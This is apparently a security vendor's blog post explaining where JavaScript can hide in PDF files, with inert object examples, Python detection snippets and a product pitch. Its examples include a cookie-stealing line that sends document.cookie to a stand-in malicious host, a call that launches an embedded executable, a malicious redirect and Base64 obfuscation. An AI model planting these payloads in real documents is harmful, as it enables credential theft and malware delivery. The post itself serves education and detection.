Understanding Embedded JavaScript in PDF Documents
5/29/2024 - Brian O'Neill



Malicious PDFs are an extremely popular attack vector, and that’s not going to change any time soon.

It’s easy for a sophisticated threat actor - especially one with a strong understanding of PDF file structure - to embed malicious JavaScript in sensitive locations within a PDF document.

Embedded malicious scripts can run automatically when a document is opened, or they can run in response to user interactions within the document. They can be specially designed to exploit vulnerable PDF reader technologies, including those built into our web browsers.

So just where, exactly, can a threat actor embed JavaScript within a PDF document?

In this article, we’ll walk through a few of the key locations we might expect to find JavaScript embedded within PDF file structure. We'll look at a few basic, inert examples of JavaScript injections in a document along the way.

Towards the end, we'll also take a brief look at encrypted and encoded versions of JavaScript injections to understand how threat actors can obfuscate their code.

Understanding PDF File Structure

Before we understand where JavaScript can be embedded within a PDF document, we should first review PDF file structure at a high level.

Header

Every PDF document begins with a header. The header specifies the exact version of PDF formatting that particular PDF document adheres to.

For example, a basic header might look something like %PDF-1.4. The % character is used to indicate the start of a comment within a PDF file.
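As a minimal sketch of how a tool might read this header, the Python snippet below searches the start of a file for the %PDF-x.y marker. The function name pdf_version and the 1024-byte search window are assumptions made for illustration (some readers are known to tolerate a small amount of data before the header); this is not how any particular product parses PDFs.

```python
import re

# Matches the version marker, e.g. %PDF-1.4
HEADER_RE = re.compile(rb"%PDF-(\d)\.(\d)")

def pdf_version(data: bytes):
    """Return (major, minor) from the PDF header, or None if no header is found."""
    # Assumption: only look near the start of the file for the marker.
    match = HEADER_RE.search(data[:1024])
    if match is None:
        return None
    return int(match.group(1)), int(match.group(2))

# A tiny, inert sample that is just enough to carry a header.
sample = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"
print(pdf_version(sample))
```

A missing or malformed header is itself worth flagging, since it suggests the file is not what its extension claims.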

Body

The body of a PDF document stores all the objects that collectively make up the document contents. Within each object in the PDF body, we can expect to find many different types of data, including metadata, page content data, and data related to interactive elements.

One example of an object is the Pages object. This contains references to all pages within the PDF document, and it's entirely separate from a Page object, which instead represents the structure of each specific page within the document.

We’ll find the actual contents of those pages – such as text and images – stored within content streams, which each Page object references.

All these objects have unique identifiers, and they seamlessly work together to construct the content we see when we open up a PDF file.

Cross-Reference Table (xref)

When a PDF document is loaded in a PDF reader, the xref table functions like a map, helping the PDF reader quickly locate different parts of the document.

The table records the byte offset of each object in the file, so the PDF reader can jump directly to the object it needs instead of scanning the whole document.

Trailer

In the Trailer, we’ll find the information needed to process the PDF document – such as the location of the xref table. We’ll also find the %%EOF (End Of File) marker here, which indicates the final line of the document.
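To make the relationship between the Trailer and the xref table concrete, here is a small Python sketch that reads the offset stored after the startxref keyword, which precedes %%EOF in a conventional PDF. The helper name find_startxref and the 2048-byte tail window are illustrative assumptions, and the sample bytes are a deliberately tiny, inert stand-in for a real file.

```python
import re

def find_startxref(data: bytes):
    """Return the byte offset recorded after the last 'startxref' keyword, or None."""
    tail = data[-2048:]  # assumption: the trailer sits near the end of the file
    matches = re.findall(rb"startxref\s+(\d+)\s+%%EOF", tail)
    return int(matches[-1]) if matches else None

# Build a tiny sample so the recorded offset really points at the xref table.
body = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
xref_offset = len(body)
sample = (
    body
    + b"xref\n0 1\n0000000000 65535 f \n"
    + b"trailer\n<< /Size 1 /Root 1 0 R >>\n"
    + b"startxref\n" + str(xref_offset).encode("ascii") + b"\n%%EOF\n"
)

offset = find_startxref(sample)
print(offset, sample[offset:offset + 4])
```

If the recorded offset does not land on an xref section, the file has been altered or malformed, which ties into the format-manipulation techniques discussed later in this article.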

Embedding JavaScript Within PDF File Structure

Now that we understand overarching PDF file structure, we can look at specific locations where JavaScript can be embedded to cause various actions to occur within the document.

Catalog Object

The Catalog is the root object of a PDF document, located within the body of the document. It references essential objects within the document.

If, for example, a PDF contained an Outline to help viewers navigate through the document, that Outline would be referenced from the Catalog.

The Catalog is also where OpenAction entries can be specified. OpenAction entries allow various actions to be taken when a PDF document is opened. This is a popular area to embed JavaScript within a PDF document.

Embedded JavaScript in the Catalog can perform malicious actions once the document is opened. Code embedded in the Catalog can be used to exploit vulnerabilities in the viewer’s PDF reader to execute arbitrary code on their system.

Here's a basic example of JavaScript in a simple PDF Catalog that would execute from the OpenAction:

1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
  /OpenAction <<
    /S /JavaScript
    /JS (app.alert({ cMsg: "You've been hacked!", cTitle: "Warning", nIcon: 1, nType: 0 });)
  >>
>>
endobj
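An analyst who wants to read a script like the one above first has to pull it out of the object. The Python sketch below does that for the simple case where /JS is followed by a literal string in parentheses, tracking nested parentheses and backslash escapes. The function name extract_js_strings is hypothetical, and the sketch deliberately ignores hex strings, indirect references, and compressed streams.

```python
def extract_js_strings(data: bytes) -> list:
    """Return the literal-string payload that follows each /JS key."""
    results = []
    pos = 0
    while True:
        key = data.find(b"/JS", pos)
        if key == -1:
            break
        i = key + 3
        while i < len(data) and data[i:i + 1].isspace():
            i += 1
        if data[i:i + 1] != b"(":
            pos = i  # not a literal string (e.g. a reference); skip it
            continue
        depth, j, out = 0, i, bytearray()
        while j < len(data):
            ch = data[j:j + 1]
            if ch == b"\\":            # keep escape pairs verbatim
                out += data[j:j + 2]
                j += 2
                continue
            if ch == b"(":
                depth += 1
                if depth > 1:          # nested paren belongs to the script
                    out += ch
            elif ch == b")":
                depth -= 1
                if depth == 0:         # closing paren of the PDF string
                    break
                out += ch
            else:
                out += ch
            j += 1
        if depth == 0 and j < len(data):
            results.append(out.decode("latin-1"))
        pos = j + 1
    return results

sample = b'''1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
  /OpenAction <<
    /S /JavaScript
    /JS (app.alert({ cMsg: "You've been hacked!", cTitle: "Warning", nIcon: 1, nType: 0 });)
  >>
>>
endobj
'''
for script in extract_js_strings(sample):
    print(script)
```

Counting parenthesis depth matters here because the script itself contains parentheses, so stopping at the first closing parenthesis would truncate the payload.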

Annotations

Annotations provide interactivity for PDF viewers. They can contain anything from simple text to links to complex sound and video elements.

Annotations can also include JavaScript actions. By embedding JavaScript within an Annotation object, a threat actor can trigger a malicious action to occur when the user clicks on the annotation.

If, for example, a malicious PDF was opened within a web browser’s built-in PDF viewer, embedded JavaScript within an interactive Annotation could initiate a Cross-Site Scripting attack, allowing the attacker to perform various actions on behalf of the user.

Here's a simple example of what a JavaScript injection in an Annotation could look like:

4 0 obj
<<
  /Type /Annot
  /Subtype /Text
  /Rect [100 100 200 200]
  /F 4
  /C [1 0 0]
  /T (XSS Attack)
  /Popup 6 0 R
  /Contents (Click me!)
  /Action <<
    /S /JavaScript
    /JS (document.write('<img src="https://malicious-site.com/logger.php?data=' + document.cookie + '" />');)
  >>
>>
endobj

Embedded Files

JavaScript can be used to directly access - and directly open - embedded files within a PDF document. Files are stored within a PDF as embedded file streams, and each embedded file is represented by a file specification dictionary that can be accessed via interactive PDF elements.

For example, interacting with a dynamic Annotation could open a file from an embedded file stream – such as a hidden executable.

Here's a simple example of what a JavaScript Annotation opening an executable within a PDF could look like:

4 0 obj
<<
  /Type /Annot
  /Subtype /Text
  /Rect [100 100 200 200]
  /F 4
  /C [1 0 0]
  /T (Hidden Executable)
  /Popup 6 0 R
  /Contents (Click me!)
  /Action <<
    /S /JavaScript
    /JS (this.exportDataObject({ cName: "executable.exe", nLaunch: 2 });)
  >>
>>
endobj

Interactive Forms

Interactive form fields in a PDF allow users to engage with PDF documents in much the same way they might engage with form entries on a website. JavaScript embedded within a form field can trigger various malicious actions when the user interacts with that part of the form.

If, for example, embedded JavaScript was attempting to send the user to a malicious website, it could look like this:

4 0 obj
<<
  /Type /Annot
  /Subtype /Widget
  /FT /Btn
  /T (Redirect Button)
  /F 4
  /Rect [100 100 200 200]
  /AA <<
    /C <<
      /S /JavaScript
      /JS (this.getURL('http://maliciouswebsite.com');)
    >>
  >>
>>
endobj
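The locations covered in this section share a handful of telltale names. As a rough first-pass triage, the Python sketch below counts how often those names appear in the raw bytes of a file. The list of names and the function count_suspicious_names are illustrative assumptions, not an exhaustive or authoritative rule set, and a plain byte scan like this will miss anything stored inside compressed or encrypted streams.

```python
import re

# Names tied to the locations discussed above (illustrative, not exhaustive).
SUSPICIOUS_NAMES = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/EmbeddedFile")

def count_suspicious_names(data: bytes) -> dict:
    """Count how often each name appears as a whole PDF name token."""
    counts = {}
    for name in SUSPICIOUS_NAMES:
        # The lookahead stops /AA from matching longer names that start with it.
        pattern = re.escape(name) + rb"(?![A-Za-z0-9])"
        counts[name.decode("ascii")] = len(re.findall(pattern, data))
    return counts

# The inert form-field example from this section, trimmed slightly.
sample = b"""4 0 obj
<<
  /Type /Annot
  /Subtype /Widget
  /FT /Btn
  /T (Redirect Button)
  /AA <<
    /C <<
      /S /JavaScript
      /JS (this.getURL('http://maliciouswebsite.com');)
    >>
  >>
>>
endobj
"""
for name, count in count_suspicious_names(sample).items():
    print(name, count)
```

A non-zero count does not prove a file is malicious, since legitimate forms use JavaScript too; it only tells an analyst where to look next.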

Obfuscating Malicious Code

We can expect threat actors to make their embedded JavaScript code exceedingly difficult to locate. Threat actors can hide their malicious JavaScript using a few common techniques.

Perhaps the most common among these is encryption. By encrypting malicious code within a PDF, a threat actor can all but ensure their code won’t be legible to those who lack the encryption key. This makes the job of automated security tools extremely difficult - they can't detect what they can't decrypt.

Carrying through the earlier example of a popup OpenAction message in the Catalog, here's an illustrative sketch of what an AES (Advanced Encryption Standard) encrypted version of that code could look like (the byte values shown are placeholders rather than real ciphertext):

1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
  /OpenAction <<
    /S /JavaScript
    /JS (0x78 0x9c 0xcb 0x48 0xcd 0xc9 0xc9 0xc9 0x57 0x08 0xcf 0x2f 0xca 0x49 0x51 0x28)
  >>
>>
endobj

In this illustration, revealing the obfuscated code would require the encryption key 'myEncryptionKey123'.
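While a scanner may not be able to read encrypted content, it can usually tell that encryption is in use: a PDF that uses the format's standard encryption carries an /Encrypt entry in its trailer dictionary. The Python sketch below checks for that entry. The function name is_encrypted is hypothetical, and the check assumes a classic trailer keyword is present, so files that keep this information in a cross-reference stream are not handled.

```python
import re

def is_encrypted(data: bytes) -> bool:
    """Heuristic: True if the last trailer dictionary carries an /Encrypt entry."""
    idx = data.rfind(b"trailer")
    if idx == -1:
        return False  # no classic trailer found; this sketch gives up here
    return re.search(rb"/Encrypt(?![A-Za-z0-9])", data[idx:]) is not None

# Two inert trailer fragments for illustration.
plain = b"trailer\n<< /Size 8 /Root 1 0 R >>\nstartxref\n1234\n%%EOF\n"
locked = b"trailer\n<< /Size 8 /Root 1 0 R /Encrypt 7 0 R >>\nstartxref\n1234\n%%EOF\n"

print(is_encrypted(plain), is_encrypted(locked))
```

Flagging encrypted files for closer inspection is one way a pipeline can avoid silently passing content it could not examine.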

Another common obfuscation technique involves manipulating the PDF file format itself. By changing the internal structure of a PDF file (resulting in an invalid PDF document), a threat actor can confuse traditional threat analysis tools, and they can, by the same token, exploit vulnerabilities in PDF readers.

Basic encoding techniques (like Base64 encoding), string manipulation, and even variable renaming can also obscure the purpose of JavaScript code within a document in an effort to avoid detection.

A Base64-encoded version of embedded JavaScript code, paired with a small decoding routine, could be decoded and executed at runtime after bypassing static threat detection:

1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
  /OpenAction <<
    /S /JavaScript
    /JS (JGFwcC5hbGVydCh7IGNNU2c6ICJVb3QgdGhpcyBkYXRhIGlzIGV4aXN0IHZhbHVlIiwnY1RpdGxlOiAiV2FybmluZyIsIG5JY29uOiAxLCBOdHlwZTogMCk7fSk7)
  >>
>>
endobj
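One simple way to look past this kind of encoding is to test whether a string is plausibly Base64 and, if so, decode it before inspection. The Python sketch below does that with the standard library. The function name try_decode_base64, the 16-character minimum, and the "printable ASCII" check are all assumptions chosen for illustration; real payloads may be layered or split across several strings.

```python
import base64
import binascii
import re

# Assumption: only treat reasonably long, well-formed strings as Base64 candidates.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def try_decode_base64(candidate: str):
    """Return decoded text if candidate looks like Base64 of printable ASCII, else None."""
    if len(candidate) % 4 != 0 or BASE64_RE.fullmatch(candidate) is None:
        return None
    try:
        raw = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None
    # Keep only results that read as text; random binary is probably not a script.
    if not all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
        return None
    return raw.decode("ascii")

# Encode an inert script so the round trip can be checked.
plain_script = 'app.alert("Hello");'
encoded = base64.b64encode(plain_script.encode("ascii")).decode("ascii")

print(try_decode_base64(encoded))
print(try_decode_base64(plain_script))
```

Decoded text can then be fed back through the same checks applied to unencoded scripts.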

Detecting Malicious PDFs with Cloudmersive

The Cloudmersive Advanced Virus Scan API takes a deterministic approach to custom content threat detection. It looks deep within PDF file structure to identify malicious code and improper formatting, ensuring the file contents conform with stringent PDF formatting standards.

To learn more about the Cloudmersive Virus API (including its various iterations and deployment options), please feel free to reach out to a member of our team.
